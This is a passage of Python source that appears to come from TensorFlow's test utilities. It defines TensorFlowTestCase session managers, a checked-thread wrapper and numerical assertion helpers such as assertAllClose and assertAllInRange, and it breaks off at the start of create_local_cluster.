producer, min_consumer, expected)
self.assertProtoEquals(expected, actual, msg=msg)
def assertStartsWith(self, actual, expected_start, msg=None):
"""Assert that actual.startswith(expected_start) is True.
Args:
actual: str
expected_start: str
msg: Optional message to report on failure.
"""
if not actual.startswith(expected_start):
fail_msg = "%r does not start with %r" % (actual, expected_start)
fail_msg += " : %r" % (msg) if msg else ""
self.fail(fail_msg)
def _eval_tensor(self, tensor):
if tensor is None:
return None
elif callable(tensor):
return self._eval_helper(tensor())
else:
try:
if sparse_tensor.is_sparse(tensor):
return sparse_tensor.SparseTensorValue(tensor.indices.numpy(),
tensor.values.numpy(),
tensor.dense_shape.numpy())
elif ragged_tensor.is_ragged(tensor):
return ragged_tensor_value.RaggedTensorValue(
self._eval_tensor(tensor.values),
self._eval_tensor(tensor.row_splits))
elif isinstance(tensor, ops.IndexedSlices):
return ops.IndexedSlicesValue(
values=tensor.values.numpy(),
indices=tensor.indices.numpy(),
dense_shape=tensor.dense_shape.numpy())
# Convert tensors and composite tensors to numpy arrays.
return nest.map_structure(lambda t: t.numpy(), tensor,
expand_composites=True)
except AttributeError as e:
six.raise_from(ValueError("Unsupported type %s." % type(tensor)), e)
def _eval_helper(self, tensors):
if tensors is None:
return None
return nest.map_structure(self._eval_tensor, tensors)
def evaluate(self, tensors):
"""Evaluates tensors and returns numpy values.
Args:
tensors: A Tensor or a nested list/tuple of Tensors.
Returns:
tensors numpy values.
"""
if context.executing_eagerly():
return self._eval_helper(tensors)
else:
sess = ops.get_default_session()
if sess is None:
with self.test_session() as sess:
return sess.run(tensors)
else:
return sess.run(tensors)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def session(self, graph=None, config=None, use_gpu=False, force_gpu=False):
"""A context manager for a TensorFlow Session for use in executing tests.
Note that this will set this session and the graph as global defaults.
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if
`use_gpu` is True, TensorFlow tries to run as many ops on the GPU as
possible. If both `force_gpu and `use_gpu` are False, all ops are pinned to
the CPU.
Example:
``` python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.session(use_gpu=True):
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0]
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
Yields:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if context.executing_eagerly():
yield EagerSessionWarner()
else:
with self._create_session(graph, config, force_gpu) as sess:
with self._constrain_devices_and_set_default(sess, use_gpu, force_gpu):
yield sess
@contextlib.contextmanager
def cached_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False):
"""Returns a TensorFlow Session for use in executing tests.
This method behaves differently than self.session(): for performance reasons
`cached_session` will by default reuse the same session within the same
test. The session returned by this function will only be closed at the end
of the test (in the TearDown function).
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if
`use_gpu` is True, TensorFlow tries to run as many ops on the GPU as
possible. If both `force_gpu and `use_gpu` are False, all ops are pinned to
the CPU.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.cached_session(use_gpu=True) as sess:
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0]
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
Yields:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if context.executing_eagerly():
yield FakeEagerSession(self)
else:
sess = self._get_cached_session(
graph, config, force_gpu, crash_if_inconsistent_args=True)
with self._constrain_devices_and_set_default(sess, use_gpu,
force_gpu) as cached:
yield cached
@contextlib.contextmanager
@deprecation.deprecated(None, "Use `self.session()` or "
"`self.cached_session()` instead.")
def test_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False):
"""Use cached_session instead."""
if self.id().endswith(".test_session"):
self.skipTest(
"Tests that have the name \"test_session\" are automatically skipped "
"by TensorFlow test fixture, as the name is reserved for creating "
"sessions within tests. Please rename your test if you have a test "
"with this name.")
if context.executing_eagerly():
yield None
else:
if graph is None:
sess = self._get_cached_session(
graph, config, force_gpu, crash_if_inconsistent_args=False)
with self._constrain_devices_and_set_default(sess, use_gpu,
force_gpu) as cached:
yield cached
else:
with self.session(graph, config, use_gpu, force_gpu) as sess:
yield sess
# pylint: enable=g-doc-return-or-yield
class _CheckedThread(object):
"""A wrapper class for Thread that asserts successful completion.
This class should be created using the TensorFlowTestCase.checkedThread()
method.
"""
def __init__(self, testcase, target, args=None, kwargs=None):
"""Constructs a new instance of _CheckedThread.
Args:
testcase: The TensorFlowTestCase for which this thread is being created.
target: A callable object representing the code to be executed in the
thread.
args: A tuple of positional arguments that will be passed to target.
kwargs: A dictionary of keyword arguments that will be passed to target.
"""
self._testcase = testcase
self._target = target
self._args = () if args is None else args
self._kwargs = {} if kwargs is None else kwargs
self._thread = threading.Thread(target=self._protected_run)
self._exception = None
self._is_thread_joined = False
def _protected_run(self):
"""Target for the wrapper thread. Sets self._exception on failure."""
try:
self._target(*self._args, **self._kwargs)
except Exception as e: # pylint: disable=broad-except
self._exception = e
def start(self):
"""Starts the thread's activity.
This must be called at most once per _CheckedThread object. It arranges
for the object's target to be invoked in a separate thread of control.
"""
self._thread.start()
def join(self):
"""Blocks until the thread terminates.
Raises:
self._testcase.failureException: If the thread terminates with due to
an exception.
"""
self._is_thread_joined = True
self._thread.join()
if self._exception is not None:
self._testcase.fail("Error in checkedThread: %s" % str(self._exception))
def is_alive(self):
"""Returns whether the thread is alive.
This method returns True just before the run() method starts
until just after the run() method terminates.
Returns:
True if the thread is alive, otherwise False.
"""
return self._thread.is_alive()
def check_termination(self):
"""Returns whether the checked thread was properly used and did terminate.
Every checked thread should be "join"ed after starting, and before the
test tears down. If it is not joined, it is possible the thread will hang
and cause flaky failures in tests.
Raises:
self._testcase.failureException: If check_termination was called before
thread was joined.
RuntimeError: If the thread is not terminated. This means thread was not
joined with the main thread.
"""
if self._is_thread_joined:
if self.is_alive():
raise RuntimeError(
"Thread was not joined with main thread, and is still running "
"when the test finished.")
else:
self._testcase.fail("A checked thread was not joined.")
def checkedThread(self, target, args=None, kwargs=None):
"""Returns a Thread wrapper that asserts 'target' completes successfully.
This method should be used to create all threads in test cases, as
otherwise there is a risk that a thread will silently fail, and/or
assertions made in the thread will not be respected.
Args:
target: A callable object to be executed in the thread.
args: The argument tuple for the target invocation. Defaults to ().
kwargs: A dictionary of keyword arguments for the target invocation.
Defaults to {}.
Returns:
A wrapper for threading.Thread that supports start() and join() methods.
"""
ret = TensorFlowTestCase._CheckedThread(self, target, args, kwargs)
self._threads.append(ret)
return ret
# pylint: enable=invalid-name
@py_func_if_in_function
def assertNear(self, f1, f2, err, msg=None):
"""Asserts that two floats are near each other.
Checks that |f1 - f2| < err and asserts a test failure
if not.
Args:
f1: A float value.
f2: A float value.
err: A float value.
msg: An optional string message to append to the failure message.
"""
# f1 == f2 is needed here as we might have: f1, f2 = inf, inf
self.assertTrue(
f1 == f2 or math.fabs(f1 - f2) <= err, "%f != %f +/- %f%s" %
(f1, f2, err, " (%s)" % msg if msg is not None else ""))
@py_func_if_in_function
def assertArrayNear(self, farray1, farray2, err, msg=None):
"""Asserts that two float arrays are near each other.
Checks that for all elements of farray1 and farray2
|f1 - f2| < err. Asserts a test failure if not.
Args:
farray1: a list of float values.
farray2: a list of float values.
err: a float value.
msg: Optional message to report on failure.
"""
self.assertEqual(len(farray1), len(farray2), msg=msg)
for f1, f2 in zip(farray1, farray2):
self.assertNear(float(f1), float(f2), err, msg=msg)
def _NDArrayNear(self, ndarray1, ndarray2, err):
return np.linalg.norm(ndarray1 - ndarray2) < err
@py_func_if_in_function
def assertNDArrayNear(self, ndarray1, ndarray2, err, msg=None):
"""Asserts that two numpy arrays have near values.
Args:
ndarray1: a numpy ndarray.
ndarray2: a numpy ndarray.
err: a float. The maximum absolute difference allowed.
msg: Optional message to report on failure.
"""
self.assertTrue(self._NDArrayNear(ndarray1, ndarray2, err), msg=msg)
def _GetNdArray(self, a):
# If a is tensor-like then convert it to ndarray
if tensor_util.is_tensor(a):
if isinstance(a, ops._EagerTensorBase):
a = a.numpy()
else:
a = self.evaluate(a)
if not isinstance(a, np.ndarray):
return np.array(a)
return a
def _assertArrayLikeAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# When the array rank is small, print its contents. Numpy array printing is
# implemented using inefficient recursion so prints can cause tests to
# time out.
if a.shape != b.shape and (b.ndim <= 3 or b.size < 500):
shape_mismatch_msg = ("Shape mismatch: expected %s, got %s with contents "
"%s.") % (a.shape, b.shape, b)
else:
shape_mismatch_msg = "Shape mismatch: expected %s, got %s." % (a.shape,
b.shape)
self.assertEqual(a.shape, b.shape, shape_mismatch_msg)
msgs = [msg]
if not np.allclose(a, b, rtol=rtol, atol=atol):
# Adds more details to np.testing.assert_allclose.
#
# NOTE: numpy.allclose (and numpy.testing.assert_allclose)
# checks whether two arrays are element-wise equal within a
# tolerance. The relative difference (rtol * abs(b)) and the
# absolute difference atol are added together to compare against
# the absolute difference between a and b. Here, we want to
# tell user which elements violate such conditions.
cond = np.logical_or(
np.abs(a - b) > atol + rtol * np.abs(b),
np.isnan(a) != np.isnan(b))
if a.ndim:
x = a[np.where(cond)]
y = b[np.where(cond)]
msgs.append("not close where = {}".format(np.where(cond)))
else:
# np.where is broken for scalars
x, y = a, b
msgs.append("not close lhs = {}".format(x))
msgs.append("not close rhs = {}".format(y))
msgs.append("not close dif = {}".format(np.abs(x - y)))
msgs.append("not close tol = {}".format(atol + rtol * np.abs(y)))
msgs.append("dtype = {}, shape = {}".format(a.dtype, a.shape))
# TODO(xpan): There seems to be a bug:
# tensorflow/compiler/tests:binary_ops_test pass with float32
# nan even though the equal_nan is False by default internally.
np.testing.assert_allclose(
a, b, rtol=rtol, atol=atol, err_msg="\n".join(msgs), equal_nan=True)
def _assertAllCloseRecursive(self,
a,
b,
rtol=1e-6,
atol=1e-6,
path=None,
msg=None):
path = path or []
path_str = (("[" + "][".join(str(p) for p in path) + "]") if path else "")
msg = msg if msg else ""
# Check if a and/or b are namedtuples.
if hasattr(a, "_asdict"):
a = a._asdict()
if hasattr(b, "_asdict"):
b = b._asdict()
a_is_dict = isinstance(a, collections_abc.Mapping)
if a_is_dict != isinstance(b, collections_abc.Mapping):
raise ValueError("Can't compare dict to non-dict, a%s vs b%s. %s" %
(path_str, path_str, msg))
if a_is_dict:
self.assertItemsEqual(
a.keys(),
b.keys(),
msg="mismatched keys: a%s has keys %s, but b%s has keys %s. %s" %
(path_str, a.keys(), path_str, b.keys(), msg))
for k in a:
path.append(k)
self._assertAllCloseRecursive(
a[k], b[k], rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
elif isinstance(a, (list, tuple)):
# Try to directly compare a, b as ndarrays; if not work, then traverse
# through the sequence, which is more expensive.
try:
a_as_ndarray = self._GetNdArray(a)
b_as_ndarray = self._GetNdArray(b)
self._assertArrayLikeAllClose(
a_as_ndarray,
b_as_ndarray,
rtol=rtol,
atol=atol,
msg="Mismatched value: a%s is different from b%s. %s" %
(path_str, path_str, msg))
except (ValueError, TypeError) as e:
if len(a) != len(b):
raise ValueError(
"Mismatched length: a%s has %d items, but b%s has %d items. %s" %
(path_str, len(a), path_str, len(b), msg))
for idx, (a_ele, b_ele) in enumerate(zip(a, b)):
path.append(str(idx))
self._assertAllCloseRecursive(
a_ele, b_ele, rtol=rtol, atol=atol, path=path, msg=msg)
del path[-1]
# a and b are ndarray like objects
else:
try:
self._assertArrayLikeAllClose(
a,
b,
rtol=rtol,
atol=atol,
msg=("Mismatched value: a%s is different from b%s. %s" %
(path_str, path_str, msg)))
except TypeError as e:
msg = ("Error: a%s has %s, but b%s has %s. %s" %
(path_str, type(a), path_str, type(b), msg))
e.args = ((e.args[0] + " : " + msg,) + e.args[1:])
raise
@py_func_if_in_function
def assertAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
"""Asserts that two structures of numpy arrays or Tensors, have near values.
`a` and `b` can be arbitrarily nested structures. A layer of a nested
structure can be a `dict`, `namedtuple`, `tuple` or `list`.
Note: the implementation follows
[`numpy.allclose`](https://docs.scipy.org/doc/numpy/reference/generated/numpy.allclose.html)
(and numpy.testing.assert_allclose). It checks whether two arrays are
element-wise equal within a tolerance. The relative difference
(`rtol * abs(b)`) and the absolute difference `atol` are added together
to compare against the absolute difference between `a` and `b`.
Args:
a: The expected numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor), or any arbitrarily nested of
structure of these.
b: The actual numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor), or any arbitrarily nested of
structure of these.
rtol: relative tolerance.
atol: absolute tolerance.
msg: Optional message to report on failure.
Raises:
ValueError: if only one of `a[p]` and `b[p]` is a dict or
`a[p]` and `b[p]` have different length, where `[p]` denotes a path
to the nested structure, e.g. given `a = [(1, 1), {'d': (6, 7)}]` and
`[p] = [1]['d']`, then `a[p] = (6, 7)`.
"""
if ragged_tensor.is_ragged(a) or ragged_tensor.is_ragged(b):
return self._assertRaggedClose(a, b, rtol, atol, msg)
self._assertAllCloseRecursive(a, b, rtol=rtol, atol=atol, msg=msg)
@py_func_if_in_function
def assertAllCloseAccordingToType(self,
a,
b,
rtol=1e-6,
atol=1e-6,
float_rtol=1e-6,
float_atol=1e-6,
half_rtol=1e-3,
half_atol=1e-3,
bfloat16_rtol=1e-2,
bfloat16_atol=1e-2,
msg=None):
"""Like assertAllClose, but also suitable for comparing fp16 arrays.
In particular, the tolerance is reduced to 1e-3 if at least
one of the arguments is of type float16.
Args:
a: the expected numpy ndarray or anything can be converted to one.
b: the actual numpy ndarray or anything can be converted to one.
rtol: relative tolerance.
atol: absolute tolerance.
float_rtol: relative tolerance for float32.
float_atol: absolute tolerance for float32.
half_rtol: relative tolerance for float16.
half_atol: absolute tolerance for float16.
bfloat16_rtol: relative tolerance for bfloat16.
bfloat16_atol: absolute tolerance for bfloat16.
msg: Optional message to report on failure.
"""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# types with lower tol are put later to overwrite previous ones.
if (a.dtype == np.float32 or b.dtype == np.float32 or
a.dtype == np.complex64 or b.dtype == np.complex64):
rtol = max(rtol, float_rtol)
atol = max(atol, float_atol)
if a.dtype == np.float16 or b.dtype == np.float16:
rtol = max(rtol, half_rtol)
atol = max(atol, half_atol)
if (a.dtype == dtypes.bfloat16.as_numpy_dtype or
b.dtype == dtypes.bfloat16.as_numpy_dtype):
rtol = max(rtol, bfloat16_rtol)
atol = max(atol, bfloat16_atol)
self.assertAllClose(a, b, rtol=rtol, atol=atol, msg=msg)
@py_func_if_in_function
def assertNotAllClose(self, a, b, **kwargs):
"""Assert that two numpy arrays, or Tensors, do not have near values.
Args:
a: the first value to compare.
b: the second value to compare.
**kwargs: additional keyword arguments to be passed to the underlying
`assertAllClose` call.
Raises:
AssertionError: If `a` and `b` are unexpectedly close at all elements.
"""
try:
self.assertAllClose(a, b, **kwargs)
except AssertionError:
return
raise AssertionError("The two values are close at all elements")
@py_func_if_in_function
def assertAllEqual(self, a, b, msg=None):
"""Asserts that two numpy arrays or Tensors have the same values.
Args:
a: the expected numpy ndarray or anything can be converted to one.
b: the actual numpy ndarray or anything can be converted to one.
msg: Optional message to report on failure.
"""
if (ragged_tensor.is_ragged(a) or ragged_tensor.is_ragged(b)):
return self._assertRaggedEqual(a, b, msg)
msg = msg if msg else ""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# Arbitrary bounds so that we don't print giant tensors.
if (b.ndim <= 3 or b.size < 500):
self.assertEqual(
a.shape, b.shape, "Shape mismatch: expected %s, got %s."
" Contents: %r. \n%s." % (a.shape, b.shape, b, msg))
else:
self.assertEqual(
a.shape, b.shape, "Shape mismatch: expected %s, got %s."
" %s" % (a.shape, b.shape, msg))
same = (a == b)
if (a.dtype in [
np.float16, np.float32, np.float64, dtypes.bfloat16.as_numpy_dtype
]):
same = np.logical_or(same, np.logical_and(np.isnan(a), np.isnan(b)))
msgs = [msg]
if not np.all(same):
# Adds more details to np.testing.assert_array_equal.
diff = np.logical_not(same)
if a.ndim:
x = a[np.where(diff)]
y = b[np.where(diff)]
msgs.append("not equal where = {}".format(np.where(diff)))
else:
# np.where is broken for scalars
x, y = a, b
msgs.append("not equal lhs = %r" % x)
msgs.append("not equal rhs = %r" % y)
# Handle mixed string types as a result of PY2to3 migration. That is, the
# mixing between bytes (b-prefix strings, PY2 default) and unicodes
# (u-prefix strings, PY3 default).
if six.PY3:
if (a.dtype.kind != b.dtype.kind and
{a.dtype.kind, b.dtype.kind}.issubset({"U", "S", "O"})):
a_list = []
b_list = []
# OK to flatten `a` and `b` because they are guaranteed to have the
# same shape.
for out_list, flat_arr in [(a_list, a.flat), (b_list, b.flat)]:
for item in flat_arr:
if isinstance(item, str):
out_list.append(item.encode("utf-8"))
else:
out_list.append(item)
a = np.array(a_list)
b = np.array(b_list)
np.testing.assert_array_equal(a, b, err_msg="\n".join(msgs))
@py_func_if_in_function
def assertNotAllEqual(self, a, b, msg=None):
"""Asserts that two numpy arrays or Tensors do not have the same values.
Args:
a: the expected numpy ndarray or anything can be converted to one.
b: the actual numpy ndarray or anything can be converted to one.
msg: Optional message to report on failure.
"""
try:
self.assertAllEqual(a, b)
except AssertionError:
return
raise AssertionError("The two values are equal at all elements. %s" % msg)
@py_func_if_in_function
def assertAllGreater(self, a, comparison_target):
"""Assert element values are all greater than a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertGreater(np.min(a), comparison_target)
@py_func_if_in_function
def assertAllLess(self, a, comparison_target):
"""Assert element values are all less than a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertLess(np.max(a), comparison_target)
@py_func_if_in_function
def assertAllGreaterEqual(self, a, comparison_target):
"""Assert element values are all greater than or equal to a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertGreaterEqual(np.min(a), comparison_target)
@py_func_if_in_function
def assertAllLessEqual(self, a, comparison_target):
"""Assert element values are all less than or equal to a target value.
Args:
a: The numpy `ndarray`, or anything that can be converted into a numpy
`ndarray` (including Tensor).
comparison_target: The target value of comparison.
"""
a = self._GetNdArray(a)
self.assertLessEqual(np.max(a), comparison_target)
def _format_subscripts(self, subscripts, value, limit=10, indent=2):
"""Generate a summary of ndarray subscripts as a list of str.
If limit == N, this method will print up to the first N subscripts on
separate
lines. A line of ellipses (...) will be appended at the end if the number of
subscripts exceeds N.
Args:
subscripts: The tensor (np.ndarray) subscripts, of the same format as
np.where()'s return value, i.e., a tuple of arrays with each array
corresponding to a dimension. E.g., (array([1, 1]), array([0, 1])).
value: (np.ndarray) value of the tensor.
limit: (int) The maximum number of indices to print.
indent: (int) Number of characters to indent at the beginning of each
line.
Returns:
(list of str) the multi-line representation of the subscripts and values,
potentially with omission at the end.
"""
lines = []
subscripts = np.transpose(subscripts)
prefix = " " * indent
for subscript in itertools.islice(subscripts, limit):
lines.append(prefix + str(subscript) + " : " +
str(value[tuple(subscript)]))
if len(subscripts) > limit:
lines.append(prefix + "...")
return lines
@py_func_if_in_function
def assertAllInRange(self,
target,
lower_bound,
upper_bound,
open_lower_bound=False,
open_upper_bound=False):
"""Assert that elements in a Tensor are all in a given range.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
lower_bound: lower bound of the range
upper_bound: upper bound of the range
open_lower_bound: (`bool`) whether the lower bound is open (i.e., > rather
than the default >=)
open_upper_bound: (`bool`) whether the upper bound is open (i.e., < rather
than the default <=)
Raises:
AssertionError:
if the value tensor does not have an ordered numeric type (float* or
int*), or
if there are nan values, or
if any of the elements do not fall in the specified range.
"""
target = self._GetNdArray(target)
if not (np.issubdtype(target.dtype, np.floating) or
np.issubdtype(target.dtype, np.integer)):
raise AssertionError(
"The value of %s does not have an ordered numeric type, instead it "
"has type: %s" % (target, target.dtype))
nan_subscripts = np.where(np.isnan(target))
if np.size(nan_subscripts):
raise AssertionError(
"%d of the %d element(s) are NaN. "
"Subscripts(s) and value(s) of the NaN element(s):\n" %
(len(nan_subscripts[0]), np.size(target)) +
"\n".join(self._format_subscripts(nan_subscripts, target)))
range_str = (("(" if open_lower_bound else "[") + str(lower_bound) + ", " +
str(upper_bound) + (")" if open_upper_bound else "]"))
violations = (
np.less_equal(target, lower_bound) if open_lower_bound else np.less(
target, lower_bound))
violations = np.logical_or(
violations,
np.greater_equal(target, upper_bound)
if open_upper_bound else np.greater(target, upper_bound))
violation_subscripts = np.where(violations)
if np.size(violation_subscripts):
raise AssertionError(
"%d of the %d element(s) are outside the range %s. " %
(len(violation_subscripts[0]), np.size(target), range_str) +
"Subscript(s) and value(s) of the offending elements:\n" +
"\n".join(self._format_subscripts(violation_subscripts, target)))
@py_func_if_in_function
def assertAllInSet(self, target, expected_set):
"""Assert that elements of a Tensor are all in a given closed set.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
expected_set: (`list`, `tuple` or `set`) The closed set that the elements
of the value of `target` are expected to fall into.
Raises:
AssertionError:
if any of the elements do not fall into `expected_set`.
"""
target = self._GetNdArray(target)
# Elements in target that are not in expected_set.
diff = np.setdiff1d(target.flatten(), list(expected_set))
if np.size(diff):
raise AssertionError("%d unique element(s) are not in the set %s: %s" %
(np.size(diff), expected_set, diff))
@py_func_if_in_function
def assertDTypeEqual(self, target, expected_dtype):
"""Assert ndarray data type is equal to expected.
Args:
target: The numpy `ndarray`, or anything that can be converted into a
numpy `ndarray` (including Tensor).
expected_dtype: Expected data type.
"""
target = self._GetNdArray(target)
if not isinstance(target, list):
arrays = [target]
for arr in arrays:
self.assertEqual(arr.dtype, expected_dtype)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def assertRaisesWithPredicateMatch(self, exception_type,
expected_err_re_or_predicate):
"""Returns a context manager to enclose code expected to raise an exception.
If the exception is an OpError, the op stack is also included in the message
predicate search.
Args:
exception_type: The expected type of exception that should be raised.
expected_err_re_or_predicate: If this is callable, it should be a function
of one argument that inspects the passed-in exception and returns True
(success) or False (please fail the test). Otherwise, the error message
is expected to match this regular expression partially.
Returns:
A context manager to surround code that is expected to raise an
exception.
"""
if callable(expected_err_re_or_predicate):
predicate = expected_err_re_or_predicate
else:
def predicate(e):
err_str = e.message if isinstance(e, errors.OpError) else str(e)
op = e.op if isinstance(e, errors.OpError) else None
while op is not None:
err_str += "\nCaused by: " + op.name
op = op._original_op # pylint: disable=protected-access
logging.info("Searching within error strings: '%s' within '%s'",
expected_err_re_or_predicate, err_str)
return re.search(expected_err_re_or_predicate, err_str)
try:
yield
self.fail(exception_type.__name__ + " not raised")
except Exception as e: # pylint: disable=broad-except
if not isinstance(e, exception_type) or not predicate(e):
raise AssertionError("Exception of type %s: %s" %
(str(type(e)), str(e)))
# pylint: enable=g-doc-return-or-yield
def assertRaisesOpError(self, expected_err_re_or_predicate):
return self.assertRaisesWithPredicateMatch(errors.OpError,
expected_err_re_or_predicate)
def assertShapeEqual(self, np_array, tf_tensor, msg=None):
"""Asserts that a Numpy ndarray and a TensorFlow tensor have the same shape.
Args:
np_array: A Numpy ndarray or Numpy scalar.
tf_tensor: A Tensor.
msg: Optional message to report on failure.
Raises:
TypeError: If the arguments have the wrong type.
"""
if not isinstance(np_array, (np.ndarray, np.generic)):
raise TypeError("np_array must be a Numpy ndarray or Numpy scalar")
if not isinstance(tf_tensor, ops.Tensor):
raise TypeError("tf_tensor must be a Tensor")
self.assertAllEqual(
np_array.shape, tf_tensor.get_shape().as_list(), msg=msg)
def assertDeviceEqual(self, device1, device2, msg=None):
"""Asserts that the two given devices are the same.
Args:
device1: A string device name or TensorFlow `DeviceSpec` object.
device2: A string device name or TensorFlow `DeviceSpec` object.
msg: Optional message to report on failure.
"""
device1 = pydev.canonical_name(device1)
device2 = pydev.canonical_name(device2)
self.assertEqual(
device1, device2,
"Devices %s and %s are not equal. %s" % (device1, device2, msg))
def _GetPyList(self, a):
"""Converts `a` to a nested python list."""
if isinstance(a, ragged_tensor.RaggedTensor):
return self.evaluate(a).to_list()
elif isinstance(a, ops.Tensor):
a = self.evaluate(a)
return a.tolist() if isinstance(a, np.ndarray) else a
elif isinstance(a, np.ndarray):
return a.tolist()
elif isinstance(a, ragged_tensor_value.RaggedTensorValue):
return a.to_list()
else:
return np.array(a).tolist()
def _assertRaggedEqual(self, a, b, msg):
"""Asserts that two ragged tensors are equal."""
a_list = self._GetPyList(a)
b_list = self._GetPyList(b)
self.assertEqual(a_list, b_list, msg)
if not (isinstance(a, (list, tuple)) or isinstance(b, (list, tuple))):
a_ragged_rank = a.ragged_rank if ragged_tensor.is_ragged(a) else 0
b_ragged_rank = b.ragged_rank if ragged_tensor.is_ragged(b) else 0
self.assertEqual(a_ragged_rank, b_ragged_rank, msg)
def _assertRaggedClose(self, a, b, rtol, atol, msg=None):
a_list = self._GetPyList(a)
b_list = self._GetPyList(b)
self._assertListCloseRecursive(a_list, b_list, rtol, atol, msg)
if not (isinstance(a, (list, tuple)) or isinstance(b, (list, tuple))):
a_ragged_rank = a.ragged_rank if ragged_tensor.is_ragged(a) else 0
b_ragged_rank = b.ragged_rank if ragged_tensor.is_ragged(b) else 0
self.assertEqual(a_ragged_rank, b_ragged_rank, msg)
def _assertListCloseRecursive(self, a, b, rtol, atol, msg, path="value"):
self.assertEqual(type(a), type(b))
if isinstance(a, (list, tuple)):
self.assertLen(a, len(b), "Length differs for %s" % path)
for i in range(len(a)):
self._assertListCloseRecursive(a[i], b[i], rtol, atol, msg,
"%s[%s]" % (path, i))
else:
self._assertAllCloseRecursive(a, b, rtol, atol, path, msg)
# Fix Python 3+ compatibility issues
if not six.PY2:
# pylint: disable=invalid-name
# Silence a deprecation warning
assertRaisesRegexp = googletest.TestCase.assertRaisesRegex
# assertItemsEqual is assertCountEqual as of 3.2.
assertItemsEqual = googletest.TestCase.assertCountEqual
# pylint: enable=invalid-name
@contextlib.contextmanager
def _constrain_devices_and_set_default(self, sess, use_gpu, force_gpu):
"""Set the session and its graph to global default and constrain devices."""
if context.executing_eagerly():
yield None
else:
with sess.graph.as_default(), sess.as_default():
if force_gpu:
# Use the name of an actual device if one is detected, or
# '/device:GPU:0' otherwise
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with sess.graph.device(gpu_name):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/device:CPU:0"):
yield sess
def _create_session(self, graph, config, force_gpu):
"""See session() for details."""
def prepare_config(config):
"""Returns a config for sessions.
Args:
config: An optional config_pb2.ConfigProto to use to configure the
session.
Returns:
A config_pb2.ConfigProto object.
"""
# TODO(b/114333779): Enforce allow_soft_placement=False when
# use_gpu=False. Currently many tests rely on the fact that any device
# will be used even when a specific device is supposed to be used.
allow_soft_placement = not force_gpu
if config is None:
config = context.context().config
config.allow_soft_placement = allow_soft_placement
elif not allow_soft_placement and config.allow_soft_placement:
config_copy = context.context().config
config = config_copy
config.allow_soft_placement = False
# Don't perform optimizations for tests so we don't inadvertently run
# gpu ops on cpu
config.graph_options.optimizer_options.opt_level = -1
# Disable Grappler constant folding since some tests & benchmarks
# use constant input and become meaningless after constant folding.
# DO NOT DISABLE GRAPPLER OPTIMIZERS WITHOUT CONSULTING WITH THE
# GRAPPLER TEAM.
config.graph_options.rewrite_options.constant_folding = (
rewriter_config_pb2.RewriterConfig.OFF)
config.graph_options.rewrite_options.pin_to_host_optimization = (
rewriter_config_pb2.RewriterConfig.OFF)
return config
return ErrorLoggingSession(graph=graph, config=prepare_config(config))
def _get_cached_session(self,
graph=None,
config=None,
force_gpu=False,
crash_if_inconsistent_args=True):
"""See cached_session() for documentation."""
if self._cached_session is None:
sess = self._create_session(
graph=graph, config=config, force_gpu=force_gpu)
self._cached_session = sess
self._cached_graph = graph
self._cached_config = config
self._cached_force_gpu = force_gpu
return sess
else:
if crash_if_inconsistent_args and self._cached_graph is not graph:
raise ValueError("The graph used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
if crash_if_inconsistent_args and self._cached_config is not config:
raise ValueError("The config used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
if crash_if_inconsistent_args and (self._cached_force_gpu is
not force_gpu):
raise ValueError(
"The force_gpu value used to get the cached session is "
"different than the one that was used to create the "
"session. Maybe create a new session with "
"self.session()")
return self._cached_session
@tf_export("test.create_local_cluster")
def create_local_cluster(num_workers,
num_ps,
protocol="grpc",
worker_config=None,
ps_config=None):
